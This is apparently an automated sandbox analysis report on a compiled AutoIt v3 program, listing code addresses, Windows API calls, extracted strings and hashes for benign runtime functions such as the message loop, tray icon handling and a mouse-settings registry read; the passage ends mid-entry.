0x00000000
0x00000000
0x00445843
0x00445844
0x0044584a
0x00000000
0x00000000
0x00445850
0x00445854
0x00445858
0x0044585a
0x00000000
0x00000000
0x0044585c
0x0044585c
0x00000000
0x00000000
0x00445878
0x00445880
0x00000000
0x00000000
0x00445886
0x0044588a
0x0044588c
0x0044588f
0x0044588f
0x00000000
0x00000000
0x004458a6
0x004458aa
0x004458ae
0x004458b0
0x00000000
0x00000000
0x004458b2
0x004458b4
0x004458b4
0x004458b9
0x004458bd
0x004458bd
0x004458c2
0x00000000
0x00000000
0x00445896
0x0044589a
0x0044589c
0x0044589f
0x0044589f
0x00000000
0x00000000
0x00445819
0x00445807
0x00000000
0x00445828
0x00445760
0x00445760
0x00445761
0x00000000
0x00000000
0x00000000
0x00445761
0x00000000
0x00000000
0x00000000
0x00445703
0x00445703
0x00445706
0x00445708
0x0044570b
0x00445717
0x00445717
0x00445717
0x00000000
0x00445717
0x0044570d
0x00445710
0x00000000
0x00000000
0x00445712
0x00000000
0x00445718
0x00445718
0x0044571b
0x0044571b
0x00445722
0x00445726
0x00000000
0x004458f4
0x004458fd
0x00445902
0x00445908
0x00445909
0x0044590d
0x00445911
0x00445911
0x00000000
0x004456e9
0x0044556f
0x0044556f
0x00445572
0x00445576
0x00445576
0x00445579
0x0044557d
0x00445580
0x00445585
0x00000000
0x00000000
0x00445587
0x0044558b
0x0044558e
0x0044558e
0x00445592
0x00445597
0x004455ac
0x004455af
0x004455b1
0x004455b4
0x00000000
0x00000000
0x004455b6
0x004455b9
0x00445645
0x0044565c
0x00000000
0x0044565c
0x00000000
0x004455b9
0x004455a0
0x004455a2
0x00000000
0x00000000
0x004455a8
0x00000000
0x004455bf
0x004455bf
0x004455c3
0x004455c4
0x004455c4
0x004455cb
0x004455cf
0x004455cf
0x004455d3
0x004455d4
0x004455d9
0x004455ff
0x00445608
0x00445611
0x00445612
0x00445616
0x0044561b
0x0044561e
0x00445622
0x00445626
0x00445629
0x004456ba
0x004456be
0x00000000
0x004456be
0x0044562f
0x00445576
0x00445579
0x0044557d
0x00445580
0x00445585
0x00000000
0x00000000
0x00000000
0x00445585
0x004455db
0x004455df
0x004455e0
0x004455e0
0x004455e2
0x004455e5
0x004455e9
0x004455ed
0x00000000
0x00000000
0x004455ef
0x004455ef
0x00445642
0x00445642
0x004455e5
0x004455e9
0x004455ed
0x00000000
0x00000000
0x00000000
0x004455f2
0x004455f2
0x004455f6
0x00445638
0x0044563c
0x00000000
0x00000000
0x0044563e
0x00445640
0x004455fb
0x004455fb
0x00000000
0x004455fb
0x00000000
0x00445640
0x004455f8
0x004455f8
0x004455f9
0x00000000
0x00000000
0x00000000
0x004455f9
0x004455e2
0x00445576
0x00410d3a
0x00410d41
0x00445b2c
0x00445b33
0x00000000
0x00000000
0x00445b40
0x00445b45
0x00445b52
0x00445b57
0x00445b59
0x00000000
0x00000000
0x00445b5f
0x00445b67
0x00000000
0x00000000
0x00445b78
0x00445b7a
0x00445b7c
0x00000000
0x00000000
0x00445b85
0x00445b90
0x00445b9b
0x00445ba6
0x00445bbe
0x00445bc9
0x00445bd0
0x00445bec
0x00445bf8
0x00445bfd
0x00445c0f
0x00445c1b
0x00445c22
0x00445c27
0x00445c2e
0x00000000
0x00445c2e
0x00445c38
0x00445c3f
0x00445c3f
0x00410d47
0x00410d47
0x00410d50
0x00445c51
0x00445c57
0x00445c5b
0x00445c60
0x00000000
0x00000000
0x00445c71
0x00445c7d
0x00445c87
0x00445ca6
0x00445ca6
0x00445cb1
0x00445cb3
0x00411098
0x00411098
0x0041109f
0x00000000
0x0041109f
0x00410d59
0x00410fdd
0x00410fdf
0x00410fe5
0x00410fec
0x0041100f
0x0041100f
0x00411015
0x00411018
0x00000000
0x00000000
0x00445e04
0x00445e07
0x00445e0a
0x00000000
0x00445e10
0x00445e10
0x00000000
0x00445e42
0x00445e44
0x00000000
0x00000000
0x00445e2b
0x00445e2d
0x00000000
0x00000000
0x00445e17
0x00445e19
0x00445e49
0x00445e49
0x00445e4b
0x00445e4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00445e20
0x00445e22
0x00445e32
0x00445e32
0x00445e34
0x00445e36
0x00445e4f
0x00445e5b
0x00445e5d
0x00445e62
0x00445e67
0x00445e75
0x00445e77
0x00445e7c
0x00445e7e
0x00445e7e
0x00000000
0x00000000
0x00445e84
0x00445e86
0x00445f01
0x00445f01
0x00445f07
0x00445f0e
0x00445f18
0x00000000
0x00445f18
0x00445e88
0x00445e88
0x00445e8e
0x00445e91
0x00445e98
0x00445ea5
0x00445eb0
0x00445ebb
0x00445ec8
0x00445ed6
0x00445ee4
0x00445eee
0x00445ef0
0x00445efc
0x00000000
0x00445efc
0x00445e93
0x00445e96
0x00000000
0x00000000
0x00000000
0x00445e96
0x00445e38
0x00000000
0x00000000
0x00000000
0x00000000
0x00445e10
0x00000000
0x00445e0a
0x00410fee
0x00410ff4
0x00410ff9
0x00410ffb
0x00000000
0x00000000
0x00410ffd
0x0041108f
0x0041108f
0x00411096
0x00411103
0x00000000
0x00411103
0x00000000
0x00411096
0x00411003
0x00411009
0x00000000
0x00000000
0x00000000
0x00411009
0x00410d62
0x00445f24
0x00445f2a
0x00445f31
0x00445f5f
0x00445f5f
0x00445f65
0x00445f67
0x00445f6c
0x00445f70
0x00445f73
0x00445f9d
0x00445fa0
0x00000000
0x00000000
0x00445fa6
0x00445fa6
0x00445fac
0x00445fb1
0x00445fb5
0x00445fb7
0x00445fff
0x00445fff
0x00446006
0x0044603a
0x0044603a
0x0044603c
0x00446008
0x00446008
0x0044600c
0x00446010
0x00446012
0x00446014
0x00446014
0x0044601a
0x00446022
0x00446029
0x0044602b
0x0044602b
0x00446047
0x0044604e
0x00446058
0x00000000
0x00446058
0x00445fbf
0x00445fc5
0x00445fcd
0x00445fe5
0x00445feb
0x00445ff1
0x00445ff5
0x00000000
0x00445ff5
0x00445fdd
0x00445fdf
0x00000000
0x00000000
0x00000000
0x00445fdf
0x00445f7a
0x00445f80
0x00445f84
0x00445f89
0x00445f8c
0x00445f91
0x00000000
0x00000000
0x00445f97
0x00000000
0x00445f97
0x00445f33
0x00445f39
0x00445f3e
0x00445f40
0x00000000
0x00000000
0x00445f42
0x00445f4c
0x00445f4c
0x00445f52
0x00445f54
0x00445c8e
0x00445c94
0x00445c94
0x00445c9e
0x00000000
0x00445c9e
0x00445f44
0x00445f4a
0x00000000
0x00000000
0x00000000
0x00410d71
0x00410d74
0x00000000
0x00410d95
0x00410d95
0x00410d98
0x00410d9b
0x00410da1
0x00410da7
0x00445df5
0x00445df5
0x00000000
0x00410db5
0x00410db8
0x00410dbe
0x00000000
0x00000000
0x00410dc7
0x00410dce
0x00410dd2
0x00410dd6
0x00410dda
0x00410ddc
0x00410de0
0x00410de4
0x00410de8
0x00410dee
0x00410ec8
0x00410ecb
0x00410eda
0x00410edb
0x00410ede
0x00445d14
0x00445d23
0x00410f06
0x00410f06
0x00410f08
0x00410e00
0x00410e00
0x00410e06
0x00410f46
0x00410f4b
0x00410f4e
0x00445d4b
0x00445d56
0x00445d5b
0x00445d5b
0x00410f55
0x00410f5a
0x00410f5d
0x00410f5d
0x00410e0c
0x00410e10
0x00410e14
0x00410e18
0x00410e1b
0x004110e9
0x004110ec
0x004110ef
0x00000000
0x00000000
0x004110f5
0x00000000
0x00445d85
0x00445d87
0x00445d8e
0x00445d90
0x00445d90
0x00000000
0x00000000
0x00000000
0x00000000
0x00445d63
0x00445d65
0x00000000
0x00000000
0x00445d6b
0x00445d6c
0x00445d72
0x00000000
0x00000000
0x00445d78
0x00445d7a
0x00000000
0x00000000
0x00445d80
0x00000000
0x00000000
0x00445d9d
0x00445da5
0x00000000
0x00000000
0x00445dab
0x00445dad
0x00445db4
0x00445db6
0x00445db6
0x00000000
0x00000000
0x00445dd5
0x00445dd7
0x00000000
0x00000000
0x00445ddd
0x00445ddf
0x00445ddf
0x00445de4
0x00445de8
0x00445de8
0x00445ded
0x00000000
0x00000000
0x00445dc0
0x00445dc2
0x00445dc9
0x00445dcb
0x00445dcb
0x00000000
0x00000000
0x004110f5
0x00410e21
0x00410e21
0x00410e29
0x00000000
0x00410e29
0x00410f15
0x00410f18
0x00410f1d
0x00000000
0x00000000
0x00445d36
0x00445d3b
0x00445d3f
0x00000000
0x00445d3f
0x00410ee4
0x00410eeb
0x00000000
0x00410f01
0x00000000
0x00000000
0x00410f28
0x00410f2c
0x00410f34
0x00410f3c
0x00000000
0x00000000
0x00445cbd
0x00445cc8
0x00445cca
0x00445ccf
0x00445cd1
0x00445cf6
0x00445d02
0x00445d06
0x00445d0a
0x00000000
0x00445d0a
0x00445cd3
0x00445cd7
0x00445ce3
0x00445ce8
0x00445cec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00410eeb
0x00410ed0
0x00000000
0x00410ed0
0x00410dfb
0x00000000
0x00410dfb
0x00410da7
0x00410d74
0x00410c7e
0x00410c7e
0x00410c85
0x00410c8d
0x00410c9d
0x00410ca8
0x00410ca8
0x00410cb2
0x00410cba
0x00410cc1
0x00410cc3
0x00410cc8
0x00410ccd
0x00410cd2
0x004110fc
0x00410cd8
0x00410cd8
0x00410cd8
0x00410cde
0x00410cf0
0x004452da
0x004452e6
0x004452e9
0x004452ee
0x004452f3
0x004452f8
0x004452fa
0x004452fd
0x004452ff
0x004452ff
0x00445304
0x0044530c
0x00445316
0x00000000
0x0044531c
0x00445323
0x00445326
0x0044532b
0x0044532d
0x0044532f
0x00000000
0x00000000
0x00445339
0x00445341
0x00445349
0x00445351
0x00445369
0x00445374
0x00445378
0x00445391
0x0044539d
0x004453a6
0x004453be
0x004453c9
0x004453cd
0x004453e6
0x004453f2
0x004453fb
0x00445413
0x0044541e
0x00445422
0x0044543b
0x00445447
0x0044544c
0x0044545e
0x00445467
0x0044546e
0x00445473
0x0044547a
0x00000000
0x0044547a
0x00445316
0x00410d04
0x00445484
0x0044548b
0x004454a0
0x004454a0
0x004454a2
0x004454a2
0x00000000
0x004454a2
0x0044548d
0x00445494
0x00000000
0x00000000
0x00445496
0x0044549c
0x00000000
0x0044549c
0x00410d0a
0x00410d0a
0x00410d11
0x00410d13
0x00410d1c
0x00410d25
0x00410d2a
0x00410d2a
0x00410d13
0x00000000
0x00410c85
0x00410c10
0x00410c10
0x00410c1c
0x00410c23
0x00410c2b
0x00000000
0x00410c30
0x00410c32
0x00000000
0x00410c38
0x00410c38
0x00410c38
0x00410c38
0x00410c40
0x00410c40
0x00410c40
0x00410c42
0x00410c42
0x00410c42
0x00410c48
0x00000000
0x00000000
0x00410eb4
0x00410eb6
0x00410eba
0x004452cd
0x004452d0
0x00410c40
0x00410c40
0x00000000
0x00410c40
0x00410ec0
0x00410ec0
0x00410c4e
0x00410c52
0x00410c5b
0x00000000
0x00410c61
0x00410c61
0x00410c61
0x00000000
0x00410c61
0x00410c5b
0x00410e6b
0x00410e6b
0x00410e6d
0x00410e71
0x00410eac
0x00410eac
0x00000000
0x00410eac
0x00410e73
0x00410e76
0x00410e7c
0x00410e7e
0x00410e80
0x00410e82
0x00410e88
0x004452b8
0x004452be
0x00410e97
0x00410e97
0x00410e99
0x00410e9b
0x00000000
0x00000000
0x00410e9d
0x004110ae
0x004110ae
0x004110bc
0x004110c1
0x004110cc
0x004110d3
0x004110d9
0x004110e0
0x00000000
0x004110e0
0x00410ea3
0x00410ea6
0x00000000
0x00000000
0x00000000
0x00410ea6
0x00410e96
0x00410e96
0x00000000
0x00410e96
0x00410e8e
0x00410e94
0x00000000
0x00000000
0x00000000
0x00410e94
0x00410c05
0x00445147
0x00410ba5
0x0044514c
0x00445153
0x00000000
0x00000000
0x00445159
0x00410bbf
0x00410f70
0x00410f70
0x00410f78
0x00000000
0x00000000
0x00410f7e
0x00410f84
0x00410f87
0x0044515e
0x00445164
0x0044519c
0x0044519c
0x00000000
0x0044519c
0x00445166
0x0044516b
0x0044516e
0x00445170
0x00445172
0x00000000
0x00000000
0x00445174
0x00445178
0x00000000
0x00000000
0x00445189
0x0044518f
0x00445191
0x00410fa3
0x00410fb5
0x00410fb7
0x00000000
0x00000000
0x00000000
0x00410fbd
0x00445197
0x00410f8d
0x00410f94
0x00410f9a
0x00410f9f
0x00410fa1
0x00410fc7
0x00410fd5
0x00410fd5
0x00000000
0x00410fa1
0x004451ab
0x004451b2
0x004451b2
0x00410bc5
0x00410bcc
0x004451c1
0x004451c8
0x004451cf
0x004451cf
0x00410bd9
0x00446063
0x00446068
0x00446078
0x00000000
0x00410bdf
0x00410bdf
0x00000000
0x00410bdf
0x00410bd9
0x00000000
0x00410b7f

APIs

PeekMessageW.USER32 ref: 00410BBB
timeGetTime.WINMM ref: 00410E76
PeekMessageW.USER32 ref: 00410FB3
TranslateMessage.USER32(?), ref: 00410FC7
DispatchMessageW.USER32 ref: 00410FD5
Sleep.KERNELBASE(0000000A), ref: 00410FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0041105A
DestroyWindow.USER32 ref: 00411066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00411080
Sleep.KERNEL32(0000000A,?,?), ref: 004452AD
TranslateMessage.USER32(?), ref: 0044608A
DispatchMessageW.USER32 ref: 00446098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004460AC

Strings

@TRAY_ID, xrefs: 00445BB9
prL, xrefs: 0044542D
@COM_EVENTOBJ, xrefs: 0044591A
prL, xrefs: 00445BDE
prL, xrefs: 004453D8
prL, xrefs: 00445383
@GUI_CTRLID, xrefs: 00445364
@GUI_CTRLHANDLE, xrefs: 0044540E
@GUI_WINHANDLE, xrefs: 004453B9

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prL$prL$prL$prL
API String ID: 4003667617-1216555602
Opcode ID: 05ea4264e16be90cf5737204baa9bfb4710d692570cb64b73936720a783afae8
Instruction ID: 5656ccdeff13743ef5fafe8623a2353e254cf1e2365aa485d3f3078d0d2561ca
Opcode Fuzzy Hash: 05ea4264e16be90cf5737204baa9bfb4710d692570cb64b73936720a783afae8
Instruction Fuzzy Hash: 6BB2A470608741DFEB24DF25C884BAAB7E5BF84304F14492FE44997392DB79E885CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00415F88, Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00407D2C: _memmove.LIBCMT ref: 00407D66

GetForegroundWindow.USER32(0048F910,?,?,?,?,?), ref: 00416042
IsWindow.USER32(?), ref: 00450FFA

Strings

LAST, xrefs: 00450DB1
HANDLE, xrefs: 00450DDD
INSTANCE, xrefs: 00450F39
CLASS, xrefs: 00450E24
REGEXPCLASS, xrefs: 00450E45
REGEXPTITLE, xrefs: 00450DF3
ACTIVE, xrefs: 00450DC7
ALL, xrefs: 00450F61
TITLE, xrefs: 00450F8F

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 01313e8f9d302f809889373820f12a26032455b50c1dfe31fe48adf669744df3
Instruction ID: d84b33950cc9dea91d6c875b386e3144a241cc22e54774cf695bc00c6053f8ee
Opcode Fuzzy Hash: 01313e8f9d302f809889373820f12a26032455b50c1dfe31fe48adf669744df3
Instruction Fuzzy Hash: CCD10C31104602EFCB14EF11C441A9ABBA0BF54349F504A2FF855536A3DB7CE99ECB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403041, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403074
RegisterClassExW.USER32 ref: 0040309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
InitCommonControlsEx.COMCTL32(?), ref: 004030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
LoadIconW.USER32(000000A9), ref: 004030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

0, xrefs: 00403056
+, xrefs: 0040305D
TaskbarCreated, xrefs: 004030A4
AutoIt v3 GUI, xrefs: 00403090

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f316edc5448d5b1c0adbc22ddb0f2bed62490a930fea9617621b6011003a6786
Instruction ID: 0e09ac2d9919322b342d86481b19008a338d121ad3b6117744e7067feae746c8
Opcode Fuzzy Hash: f316edc5448d5b1c0adbc22ddb0f2bed62490a930fea9617621b6011003a6786
Instruction Fuzzy Hash: 4021C9B1911218AFEB40EF94EC49B9DBBF4FB08710F10853AF511A62A0D7B545448FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403633, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
KillTimer.USER32(?,00000001), ref: 004036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
CreatePopupMenu.USER32 ref: 0040373E
PostQuitMessage.USER32(00000000), ref: 0040375F

Strings

%I, xrefs: 0043D2D1, 0043D31F
TaskbarCreated, xrefs: 00403725

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%I
API String ID: 129472671-1195164674
Opcode ID: 47989578d1384c494cc28c92f5f60899f357c435ea3cabc069cc89c236130677
Instruction ID: 10ee0b11622f1361c7ec63440bed57d6dff5d427fb300c744ab7812cb175661f
Opcode Fuzzy Hash: 47989578d1384c494cc28c92f5f60899f357c435ea3cabc069cc89c236130677
Instruction Fuzzy Hash: 6A4117B11101057BDB646F68EC09F7A3A58E744302F10853FFA02A23E1CA7D9D45976E

Uniqueness

Uniqueness Score: -1.00%

Function 00409997, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 004099C2
__swprintf.LIBCMT ref: 00409A0C
__i64tow.LIBCMT ref: 0043FA0F

Strings

False, xrefs: 0043F9D7
0x%p, xrefs: 0043F9F1
%.15g, xrefs: 00409A06
True, xrefs: 0043F9D0

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: af9d0e666f4adcba198cfd94ab2141b44bd9261d54754bb137479114dac5a078
Instruction ID: cdd8dc89b9c74c658104cf0a760322e4f13a95bb5b846f9aebd24ca3b9163d03
Opcode Fuzzy Hash: af9d0e666f4adcba198cfd94ab2141b44bd9261d54754bb137479114dac5a078
Instruction Fuzzy Hash: DE41D5B1A04219AADB24DF35D841F7773E8EF48304F20447FE549E63D2EA799D428B1A

Uniqueness

Uniqueness Score: -1.00%

Function 0040410D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D5EC

Part of subcall function 00407D2C: _memmove.LIBCMT ref: 00407D66

_memset.LIBCMT ref: 0040418D
_wcscpy.LIBCMT ref: 004041E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004041F1

Strings

Line: , xrefs: 0043D615

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: c9e73b6796a5b43290a8ea01cf8c3700e3b3cd9ec8aef65745d167178a8c263a
Instruction ID: 58a74a7614972f0f445e6137c0dd90b430b5bf5ec00f8e3566b7ff54c1cdf52a
Opcode Fuzzy Hash: c9e73b6796a5b43290a8ea01cf8c3700e3b3cd9ec8aef65745d167178a8c263a
Instruction Fuzzy Hash: 8B31C171408304AAD761EB60DC45FDB73E8AF44304F10497FB184A21D1EB78A649C79F

Uniqueness

Uniqueness Score: -1.00%

Function 004035B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
RegCloseKey.KERNELBASE(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617

Strings

Control Panel\Mouse, xrefs: 004035D2

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768

Uniqueness

Uniqueness Score: -1.00%

Function 00404531, Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00404560

Part of subcall function 0040410D: _memset.LIBCMT ref: 0040418D
Part of subcall function 0040410D: _wcscpy.LIBCMT ref: 004041E1
Part of subcall function 0040410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004041F1

KillTimer.USER32(?,00000001,?,?), ref: 004045B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004045C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D6CE

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: c13075680287430ca24cb56ce9613c291e384b8b49fca2b8204c578aded441ca
Instruction ID: ee13d0e14117257c6e1bf6a2afa9c18cb2a9610526be340c73f4befcf8864d37
Opcode Fuzzy Hash: c13075680287430ca24cb56ce9613c291e384b8b49fca2b8204c578aded441ca
Instruction Fuzzy Hash: 14210AB0904784AFE7328B24DC45BE7BBEC9F45308F0000AFE79E66281C7781A858B59

Uniqueness

Uniqueness Score: -1.00%

Function 004043DB, Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00404401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 004044A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 004044C3

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 17bf2383e5d0fcb262b91dc9a653c994bcfe1a0960b24ae6562e0ac53503ec64
Instruction ID: 9a0e1fda7f7f65855728193d4af9c2fff216fb8ced286e06550385d3abef0fd3
Opcode Fuzzy Hash: 17bf2383e5d0fcb262b91dc9a653c994bcfe1a0960b24ae6562e0ac53503ec64
Instruction Fuzzy Hash: E63184B15043119FD760DF64D884B9BBBF4FB88308F00093FE69A93291D7796944CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00420FF6, Relevance: 4.5, APIs: 3, Instructions: 44COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0042100E

Part of subcall function 0042594C: __FF_MSGBANNER.LIBCMT ref: 00425963
Part of subcall function 0042594C: __NMSG_WRITE.LIBCMT ref: 0042596A
Part of subcall function 0042594C: RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,00000000,?,?,?,00421013,?), ref: 0042598F

std::exception::exception.LIBCMT ref: 0042102C
__CxxThrowException@8.LIBCMT ref: 00421041

Part of subcall function 004287DB: RaiseException.KERNEL32(?,?,?,004BBAF8,00000000,?,?,?,?,00421046,?,004BBAF8,?,00000001), ref: 00428830

Part of subcall function 00428711: _free.LIBCMT ref: 004287BE

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_free_mallocstd::exception::exception
String ID:
API String ID: 3712093317-0
Opcode ID: 3cdff1dca6347fd574330d83dde56f8536fcea3ee633be4503939d3ce71b5738
Instruction ID: 7ef10c6c1173b09cd5bea89a6eb30a235393a82e45e25364796afe6b045364de
